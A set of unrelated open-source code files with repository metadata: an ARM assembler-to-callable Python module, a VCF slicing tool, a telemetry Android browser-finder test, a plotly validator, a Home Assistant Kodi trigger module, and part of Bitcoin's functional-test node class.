_mrs_format = _InstructionFormat("Cond 0 0 0 1 0 R 0 0 1 1 1 1 Rd 0 0 0 0 0 0 0 0 0 0 0 0")
_msr_format_reg = _InstructionFormat("Cond 0 0 0 1 0 R 1 0 f s x c 1 1 1 1 0 0 0 0 0 0 0 0 Rm")
_msr_format_imm = _InstructionFormat("Cond 0 0 1 1 0 R 1 0 f s x c 1 1 1 1 Operand2")
_swi_format = _InstructionFormat("Cond 1 1 1 1 Imm24")
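# As an illustration of the format strings above, _dpi_format describes the 32-bit
# data-processing encoding: Cond(4) 0 0 I(1) Opcode(4) S(1) Rn(4) Rd(4) Operand2(12),
# whose field widths sum to the 32 bits checked by _InstructionFormat.__init__.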
def _parse_dpi(opcode, condition, s, parser, operands):
if len(operands) not in (3, 4):
parser.error("Expected 3 or 4 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[2:])
Rd = parser.parse_register(operands[0], checked=True)
Rn = parser.parse_register(operands[1], checked=True)
fields["Rd"] = Rd
fields["Rn"] = Rn
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_move(opcode, condition, s, parser, operands):
if len(operands) not in (2, 3):
parser.error("Expected 2 or 3 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[1:])
Rd = parser.parse_register(operands[0], checked=True)
fields["Rd"] = Rd
fields["Rn"] = 0
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_cond(opcode, condition, s, parser, operands):
if len(operands) not in (2, 3):
parser.error("Expected 2 or 3 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[1:])
Rn = parser.parse_register(operands[0], checked=True)
fields["Rd"] = 0
fields["Rn"] = Rn
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_branch(condition, link, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
label = operands[0]
if label not in parser.labels:
parser.error("Undefined label: %s" % label)
target = parser.labels[label]
offset = target - parser.pc - 2
return _branch_format.encode({"L" : link, "Cond" : condition, "Offset" : offset})
def _parse_bx(condition, link, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
Rm = parser.parse_register(operands[0], checked=True)
return _bx_format.encode({"L" : link, "Cond" : condition, "Rm" : Rm})
def _parse_load_store(condition, load, B, parser, operands):
if len(operands) not in (2, 3, 4):
parser.error("Expected 2, 3 or 4 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
fields = parser.parse_load_store(operands[1:])
fields["Rd"] = Rd
fields["L"] = load
fields["B"] = B
fields["Cond"] = condition
return _load_store_format.encode(fields)
def _parse_load_store_multi(condition, load, before, increment, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
W = 0
S = 0
operand0 = operands[0]
if operand0 and operand0[-1] == '!':
W = 1
operand0 = operand0[:-1].strip()
operand1 = operands[1]
if operand1 and operand1[-1] == '^':
S = 1
operand1 = operand1[:-1].strip()
Rn = parser.parse_register(operand0, checked=True)
RegisterList = sum(1<<r for r in parser.parse_regset(operand1))
fields = {"P": before, "U": increment, "Cond" : condition, "L" : load, "W" : W, "S" : S, "Rn" : Rn, "RegisterList" : RegisterList}
return _load_store_multi_format.encode(fields)
def _parse_push_pop(condition, load, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
Rn = 13 # stack pointer
before = 1 - load
increment = load
RegisterList = sum(1<<r for r in parser.parse_regset(operands[0]))
fields = {"P": before, "U": increment, "Cond" : condition, "L" : load, "W" : 1, "S" : 0, "Rn" : Rn, "RegisterList" : RegisterList}
return _load_store_multi_format.encode(fields)
def _parse_mul(condition, S, parser, operands):
if len(operands) != 3:
parser.error("Expected 3 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
Rs = parser.parse_register(operands[2], checked=True)
if Rd == Rm:
Rm, Rs = Rs, Rm
return _mul_format.encode({"Rd" : Rd, "Rm" : Rm, "Rs" : Rs, "Cond" : condition, "S" : S})
def _parse_mla(condition, S, parser, operands):
if len(operands) != 4:
parser.error("Expected 4 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
Rs = parser.parse_register(operands[2], checked=True)
Rn = parser.parse_register(operands[3], checked=True)
if Rd == Rm:
Rm, Rs = Rs, Rm
return _mla_format.encode({"Rd" : Rd, "Rm" : Rm, "Rs" : Rs, "Rn" : Rn, "Cond" : condition, "S" : S})
def _parse_clz(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
Rm = parser.parse_register(operands[1], checked=True)
return _clz_format.encode({"Rd" : Rd, "Rm" : Rm, "Cond" : condition})
def _parse_mrs(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
R = parser.parse_status_register(operands[1])
return _mrs_format.encode({"Rd" : Rd, "R" : R, "Cond" : condition})
def _parse_msr(condition, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
R, fields = parser.parse_status_register_flags(operands[0])
fields["R"] = R
fields["Cond"] = condition
imm = parser.parse_immediate(operands[1])
if imm is not None:
fields["Operand2"] = parser.encode_immediate(imm)
return _msr_format_imm.encode(fields)
else:
Rm = parser.parse_register(operands[1], checked=True)
fields["Rm"] = Rm
return _msr_format_reg.encode(fields)
def _parse_swi(condition, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
imm24 = parser.parse_immediate(operands[0], checked=True)
limit = 1<<24
if imm24 < 0 or imm24 >= limit:
parser.error("Immediate value should be between 0 and %d, got: %d" % (limit - 1, imm24))
return _swi_format.encode({"Cond": condition, "Imm24" : imm24})
# Install data-processing instructions
_dpi_instructions = [("and", 0), ("eor", 1), ("sub", 2), ("rsb", 3), ("add", 4),
("adc", 5), ("sbc", 6), ("rsc", 7), ("orr", 12), ("bic", 14)]
for (_name, _opcode) in _dpi_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_dpi, _opcode, _i, 0)
_instructions[_fullname + "s"] = _partial(_parse_dpi, _opcode, _i, 1)
# Install move instructions
_move_instructions = [("mov", 13), ("mvn", 15)]
for (_name, _opcode) in _move_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_move, _opcode, _i, 0)
_instructions[_fullname + "s"] = _partial(_parse_move, _opcode, _i, 1)
# Install test instructions
_cond_instructions = [("tst", 8), ("teq", 9), ("cmp", 10), ("cmn", 11)]
for (_name, _opcode) in _cond_instructions:
for _i in range(len(_conditions)):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_cond, _opcode, _i, 1)
# Install branch instructions
for _i in range(len(_conditions)):
_fullname = "b" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_branch, _i, 0)
_fullname = "bl" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_branch, _i, 1)
_fullname = "bx" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_bx, _i, 0)
_fullname = "blx" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_bx, _i, 1)
# Install load/store instructions
for _i in range(len(_conditions)):
_fullname = "ldr" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 0)
_fullname = "str" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 0)
_fullname = "ldr" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 1, 1)
_fullname = "str" + _conditions[_i] + "b"
_instructions[_fullname] = _partial(_parse_load_store, _i, 0, 1)
# Install load/store multi instructions
for _i in range(len(_conditions)):
_fullname = "push" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_push_pop, _i, 0)
_fullname = "pop" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_push_pop, _i, 1)
for _increment in range(2):
for _before in range(2):
_mode = "di"[_increment] + "ab"[_before]
_fullname = "ldm" + _conditions[_i] + _mode
_instructions[_fullname] = _partial(_parse_load_store_multi, _i, 1, _before, _increment)
_fullname = "stm" + _conditions[_i] + _mode
_instructions[_fullname] = _partial(_parse_load_store_multi, _i, 0, _before, _increment)
# Install MULtiply instructions
for _i in range(len(_conditions)):
_fullname = "mul" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mul, _i, 0)
_fullname = _fullname + "s"
_instructions[_fullname] = _partial(_parse_mul, _i, 1)
_fullname = "mla" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mla, _i, 0)
_fullname = _fullname + "s"
_instructions[_fullname] = _partial(_parse_mla, _i, 1)
# Install Count Leading Zero instructions
for _i in range(len(_conditions)):
_fullname = "clz" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_clz, _i)
# Install Move Register from/to Status instructions
for _i in range(len(_conditions)):
_fullname = "mrs" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_mrs, _i)
_fullname = "msr" + _conditions[_i]
_instructions[_fullname] = _partial(_parse_msr, _i)
# Install SoftWare Interrupt instructions
for _i in range(len(_conditions)):
for _name in ("swi", "svc"):
_fullname = _name + _conditions[_i]
_instructions[_fullname] = _partial(_parse_swi, _i)
# support for LDR pseudo-instruction
def _wrap_ldr(ldr, mov, mvn, parser, operands):
if len(operands) == 2:
imm = parser.parse_immediate(operands[1], checked=False, prefix="=")
if imm is not None:
parser.parse_register(operands[0], checked=True)
if parser.encode_immediate(imm, checked=False) is not None:
operands = [operands[0], "#%d" % imm]
return mov(parser, operands)
elif parser.encode_immediate(~imm, checked=False) is not None:
operands = [operands[0], "#%d" % ~imm]
return mvn(parser, operands)
else:
address = parser.get_constant_pool_address(imm)
address = 4 * (address - parser.pc - 2)
return ldr(parser, [operands[0], "[pc, #%d]" % address])
return ldr(parser, operands)
for _cond in _conditions:
_name = "ldr" + _cond
_instructions[_name] = _partial(_wrap_ldr, _instructions[_name],
_instructions["mov" + _cond], _instructions["mvn" + _cond])
def _make_executable_array(opcodes):
import mmap
n = len(opcodes)
m = mmap.mmap(-1, 4*n, prot=mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC)
result = (_ctypes.c_uint32 * n).from_buffer(m)
for i in range(n):
result[i] = opcodes[i]
return result
_type_flags = {
"b" : _ctypes.c_int8,
"B" : _ctypes.c_uint8,
"h" : _ctypes.c_int16,
"H" : _ctypes.c_uint16,
"i" : _ctypes.c_int32,
"I" : _ctypes.c_uint32,
"l" : _ctypes.c_int64,
"L" : _ctypes.c_uint64,
"str" : _ctypes.c_char_p,
"ch" : _ctypes.c_char,
"bool" : _ctypes.c_bool,
"p" : _ctypes.c_void_p,
"" : None
}
def prototype(proto):
if not isinstance(proto, str):
return proto
args, result = proto.split("->")
result = _type_flags[result.strip()]
args = [_type_flags[a.strip()] for a in args.split()]
return _ctypes.CFUNCTYPE(result, *args)
def _make_function(exec_array, proto):
proto = prototype(proto)
f = proto(_ctypes.addressof(exec_array))
f.__armasm_code__ = exec_array
return f
def asm(prototype, code, libraries=()):
"""Convert ARM assembler into a callable object.
Required arguments:
prototype -- either a `ctypes.CFUNCTYPE' object or a string acceptable to `armasm.prototype'
code -- the actual assembler code, as a string
Optional arguments:
libraries -- a sequence of either `ctypes.CDLL' objects or strings acceptable to `ctypes.util.find_library'
Examples:
asm("i i -> i", "mul r0, r1, r0") -- returns a callable object which takes two integers and returns their product
"""
linenumber = 0
pc = 0
_instructions = []
labels = {}
for line in code.split("\n"):
linenumber = linenumber + 1
instruction = _Instruction(line)
instruction.linenumber = linenumber
instruction.pc = pc
if instruction.label:
labels[instruction.label] = pc
if instruction.opcode:
pc = pc + 1
_instructions.append(instruction)
opcodes = []
parser = _OperandParser(libraries)
parser.labels = labels
parser.constant_pool_offset = pc + 1
for instruction in _instructions:
if instruction.opcode:
v = instruction.parse(parser)
opcodes.append(v)
opcodes.append(0xe12fff1e) # bx lr
opcodes.extend(parser.constant_pool)
result = _make_executable_array(opcodes)
return _make_function(result, prototype)
def dis(asm_function):
"""Disassemble assembled function object.
Given a callable object created with `armasm.asm', this function
prints its disassembled listing.
    This function uses the external `objdump' tool.
    It first tries the ARM-specific `arm-linux-gnueabihf-objdump', then tries
    the generic `objdump'.
    If neither exists or its invocation produces an error, this function will error out.
"""
import tempfile
import os
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
try:
executable = subprocess.check_output(("which", "arm-linux-gnueabihf-objdump")).decode().strip()
except subprocess.CalledProcessError:
executable = "objdump"
try:
f.write(bytearray(asm_function.__armasm_code__))
f.close()
output = subprocess.check_output((executable, "-D", f.name, "-m", "arm", "-b", "binary")).decode()
finally:
os.unlink(f.name)
# try to skip useless headers
start = " 0:"
loc = output.find(start)
if loc >= 0:
output = output[loc:]
print(output)
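# A minimal usage sketch (only meaningful on a 32-bit ARM host; the prototype
# string and assembler source are illustrative, mirroring the asm() docstring):
if __name__ == "__main__":
    _add = asm("i i -> i", "add r0, r0, r1")
    print(_add(2, 3))   # expected: 5
    dis(_add)           # requires an objdump binary on the PATH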
|
{
"content_hash": "aa4d2043b31d05c41e1e5a9fe91a5c1e",
"timestamp": "",
"source": "github",
"line_count": 832,
"max_line_length": 134,
"avg_line_length": 35.90625,
"alnum_prop": 0.5745129544085158,
"repo_name": "stephanh42/armasm",
"id": "6967e72200a777a5aacc3d6d2a072579718a000c",
"size": "29874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "armasm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30910"
}
],
"symlink_target": ""
}
|
"""
Tool to take a region of a VCF, cut it out, and re-assign all its coordinates to
a new contig name and starting offset.
Only rewrites the chrom and start columns; doesn't deal with any references to
positions that may occur in INFO or FORMAT values.
Variants only partially overlapping the specified range will be dropped.
"""
import argparse
import sys
import os
import doctest
def parse_args(args):
"""
Takes in the command-line arguments list (args), and returns a nice argparse
result with fields for all the options.
Borrows heavily from the argparse documentation examples:
<http://docs.python.org/library/argparse.html>
"""
# Construct the parser (which is stored in parser)
# Module docstring lives in __doc__
# See http://python-forum.com/pythonforum/viewtopic.php?f=3&t=36847
# And a formatter class so our examples in the docstring look good. Isn't it
# convenient how we already wrapped it to 80 characters?
# See http://docs.python.org/library/argparse.html#formatter-class
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--vcf_in", default=sys.stdin,
type=argparse.FileType("r"),
help="VCF file to read")
parser.add_argument("--vcf_out", default=sys.stdout,
type=argparse.FileType("w"),
help="VCF file to write")
parser.add_argument("--source_contig", required=True,
help="contig name to extract variants from")
parser.add_argument("--source_start", default=1, type=int,
help="first base (inclusive) at which to start collecting variants")
parser.add_argument("--source_end", default=float("+inf"), type=int,
help="last base (exclusive) at which to stop collecting variants")
parser.add_argument("--dest_contig", default="ref",
help="contig name to place variants on")
parser.add_argument("--dest_start", default=1, type=int,
help="base on the destination contig corresponding to --source_start")
# The command line arguments start with the program name, which we don't
# want to treat as an argument for argparse. So we remove it.
args = args[1:]
return parser.parse_args(args)
def main(args):
"""
Parses command line arguments and do the work of the program.
"args" specifies the program arguments, with args[0] being the executable
name. The return value should be used as the program's exit code.
"""
if len(args) == 2 and args[1] == "--test":
# Run the tests
return doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
options = parse_args(args) # This holds the nicely-parsed options object
for line in options.vcf_in:
# Loop through the lines in the input VCF. We need to copy the headers,
# and possibly copy and rewrite the records.
# Drop the newline
line = line.rstrip("\n")
if len(line) == 0:
# Skip blank lines
continue
if line[0] == "#":
# It's a header. Keep it
options.vcf_out.write("{}\n".format(line))
continue
# Otherwise it's a record
# Split on tabs
parts = line.split("\t")
if parts[0] != options.source_contig:
# It's not on the right contig
continue
# Parse where the variant starts
variant_start = int(parts[1])
if (variant_start < options.source_start or
variant_start >= options.source_end):
# It's out of range
            continue
# Rewrite position and contig
variant_start = (variant_start - options.source_start +
options.dest_start)
parts[1] = str(variant_start)
parts[0] = options.dest_contig
# Spit out the fixed variant
options.vcf_out.write("{}\n".format("\t".join(parts)))
if __name__ == "__main__" :
sys.exit(main(sys.argv))
|
{
"content_hash": "fb311988a0e63a2e78fceed268fbf5e9",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 80,
"avg_line_length": 34.9327731092437,
"alnum_prop": 0.6199182102477748,
"repo_name": "BD2KGenomics/hgvm-graph-bakeoff-evalutations",
"id": "11e30c0735a75a186eee3ce4ff911eda7f2fe25a",
"size": "4183",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scripts/sliceVcf.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "2078"
},
{
"name": "Python",
"bytes": "506835"
},
{
"name": "Shell",
"bytes": "44981"
}
],
"symlink_target": ""
}
|
import unittest
from telemetry import benchmark
from telemetry.core import browser_options
from telemetry.core.backends.chrome import android_browser_finder
from telemetry.unittest import system_stub
class LoggingStub(object):
def __init__(self):
self.warnings = []
def info(self, msg, *args):
pass
def warn(self, msg, *args):
self.warnings.append(msg % args)
class AndroidBrowserFinderTest(unittest.TestCase):
def setUp(self):
self._stubs = system_stub.Override(android_browser_finder,
['adb_commands', 'os', 'subprocess'])
self._log_stub = LoggingStub()
def tearDown(self):
self._stubs.Restore()
def test_no_adb(self):
finder_options = browser_options.BrowserFinderOptions()
def NoAdb(*args, **kargs): # pylint: disable=W0613
raise OSError('not found')
self._stubs.subprocess.Popen = NoAdb
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(0, len(browsers))
def test_adb_no_devices(self):
finder_options = browser_options.BrowserFinderOptions()
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(0, len(browsers))
def test_adb_permissions_error(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.subprocess.Popen.communicate_result = (
"""List of devices attached
????????????\tno permissions""",
"""* daemon not running. starting it now on port 5037 *
* daemon started successfully *
""")
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(3, len(self._log_stub.warnings))
self.assertEquals(0, len(browsers))
def test_adb_two_devices(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.adb_commands.attached_devices = ['015d14fec128220c',
'015d14fec128220d']
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(1, len(self._log_stub.warnings))
self.assertEquals(0, len(browsers))
@benchmark.Disabled('chromeos')
def test_adb_one_device(self):
finder_options = browser_options.BrowserFinderOptions()
self._stubs.adb_commands.attached_devices = ['015d14fec128220c']
def OnPM(args):
assert args[0] == 'pm'
assert args[1] == 'list'
assert args[2] == 'packages'
return ['package:org.chromium.content_shell_apk',
              'package:com.google.android.setupwizard']
self._stubs.adb_commands.shell_command_handlers['pm'] = OnPM
browsers = android_browser_finder.FindAllAvailableBrowsers(
finder_options, self._log_stub)
self.assertEquals(1, len(browsers))
|
{
"content_hash": "38cc308d8cdde3a5a07af4cafaffc7d0",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 76,
"avg_line_length": 32.325842696629216,
"alnum_prop": 0.6798748696558915,
"repo_name": "ondra-novak/chromium.src",
"id": "de9e72a83d9a0b10147346aefadeeaf1800af0c4",
"size": "3040",
"binary": false,
"copies": "6",
"ref": "refs/heads/nw",
"path": "tools/telemetry/telemetry/core/backends/chrome/android_browser_finder_unittest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "35318"
},
{
"name": "Batchfile",
"bytes": "7621"
},
{
"name": "C",
"bytes": "8692951"
},
{
"name": "C++",
"bytes": "206833388"
},
{
"name": "CSS",
"bytes": "871479"
},
{
"name": "HTML",
"bytes": "24541148"
},
{
"name": "Java",
"bytes": "5457985"
},
{
"name": "JavaScript",
"bytes": "17791684"
},
{
"name": "Makefile",
"bytes": "92563"
},
{
"name": "Objective-C",
"bytes": "1312233"
},
{
"name": "Objective-C++",
"bytes": "7105758"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "PLpgSQL",
"bytes": "218379"
},
{
"name": "Perl",
"bytes": "69392"
},
{
"name": "Protocol Buffer",
"bytes": "387183"
},
{
"name": "Python",
"bytes": "6929739"
},
{
"name": "Shell",
"bytes": "473664"
},
{
"name": "Standard ML",
"bytes": "4131"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="size", parent_name="histogram2dcontour.contours", **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
implied_edits=kwargs.pop("implied_edits", {"^autocontour": False}),
min=kwargs.pop("min", 0),
**kwargs,
)
|
{
"content_hash": "3c97570aef3e21d40dc8a81444cc79c3",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 85,
"avg_line_length": 36,
"alnum_prop": 0.5962962962962963,
"repo_name": "plotly/plotly.py",
"id": "e65320a576201eddcaaf0d741b18a0ab191c6a47",
"size": "540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/histogram2dcontour/contours/_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
"""Provides device automations for Kodi."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_ENTITY_ID,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, Event, HassJob, HomeAssistant, callback
from homeassistant.helpers import config_validation as cv, entity_registry
from homeassistant.helpers.trigger import TriggerActionType, TriggerInfo
from homeassistant.helpers.typing import ConfigType
from .const import DOMAIN, EVENT_TURN_OFF, EVENT_TURN_ON
TRIGGER_TYPES = {"turn_on", "turn_off"}
TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_ENTITY_ID): cv.entity_id,
vol.Required(CONF_TYPE): vol.In(TRIGGER_TYPES),
}
)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
"""List device triggers for Kodi devices."""
registry = entity_registry.async_get(hass)
triggers = []
# Get all the integrations entities for this device
for entry in entity_registry.async_entries_for_device(registry, device_id):
if entry.domain == "media_player":
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_ENTITY_ID: entry.entity_id,
CONF_TYPE: "turn_on",
}
)
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_ENTITY_ID: entry.entity_id,
CONF_TYPE: "turn_off",
}
)
return triggers
@callback
def _attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: TriggerActionType,
event_type,
trigger_info: TriggerInfo,
):
trigger_data = trigger_info["trigger_data"]
job = HassJob(action)
@callback
def _handle_event(event: Event):
if event.data[ATTR_ENTITY_ID] == config[CONF_ENTITY_ID]:
hass.async_run_hass_job(
job,
{"trigger": {**trigger_data, **config, "description": event_type}},
event.context,
)
return hass.bus.async_listen(event_type, _handle_event)
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: TriggerActionType,
trigger_info: TriggerInfo,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
if config[CONF_TYPE] == "turn_on":
return _attach_trigger(hass, config, action, EVENT_TURN_ON, trigger_info)
if config[CONF_TYPE] == "turn_off":
return _attach_trigger(hass, config, action, EVENT_TURN_OFF, trigger_info)
return lambda: None
|
{
"content_hash": "30b1f42f543c7aabff2f3c2bad470c5c",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 85,
"avg_line_length": 29.89,
"alnum_prop": 0.6122448979591837,
"repo_name": "nkgilley/home-assistant",
"id": "07fcf11c0771e5cd00335b802c04a88a43757bdf",
"size": "2989",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/kodi/device_trigger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Class for bitcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
import collections
import shlex
import sys
from .authproxy import JSONRPCException
from .util import (
MAX_NODES,
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
EncodeDecimal,
)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a bitcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, datadir, *, chain, rpchost, timewait, bitcoind, bitcoin_cli, coverage_dir, cwd, extra_conf=None, extra_args=None, use_cli=False, start_perf=False, use_valgrind=False, version=None):
"""
Kwargs:
start_perf (bool): If True, begin profiling the node with `perf` as soon as
the node starts.
"""
self.index = i
self.datadir = datadir
self.bitcoinconf = os.path.join(self.datadir, "bitcoin.conf")
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.chain = chain
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
self.cwd = cwd
if extra_conf is not None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.version = version
# Configuration for logging is set as command-line args rather than in the bitcoin.conf file.
# This means that starting a bitcoind using the temp dir to debug a failed test won't
# spam debug.log.
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-uacomment=testnode%d" % i,
]
if use_valgrind:
default_suppressions_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..", "..", "..", "contrib", "valgrind.supp")
suppressions_file = os.getenv("VALGRIND_SUPPRESSIONS_FILE",
default_suppressions_file)
self.args = ["valgrind", "--suppressions={}".format(suppressions_file),
"--gen-suppressions=all", "--exit-on-first-error=yes",
"--error-exitcode=1", "--quiet"] + self.args
if self.version is None or self.version >= 190000:
self.args.append("-logthreadnames")
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.start_perf = start_perf
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
# Cache perf subprocesses here by their data output filename.
self.perf_subprocesses = {}
self.p2ps = []
AddressKeyPair = collections.namedtuple('AddressKeyPair', ['address', 'key'])
PRIV_KEYS = [
# address , privkey
AddressKeyPair('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
AddressKeyPair('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
AddressKeyPair('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
AddressKeyPair('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
AddressKeyPair('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
AddressKeyPair('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
AddressKeyPair('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
AddressKeyPair('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
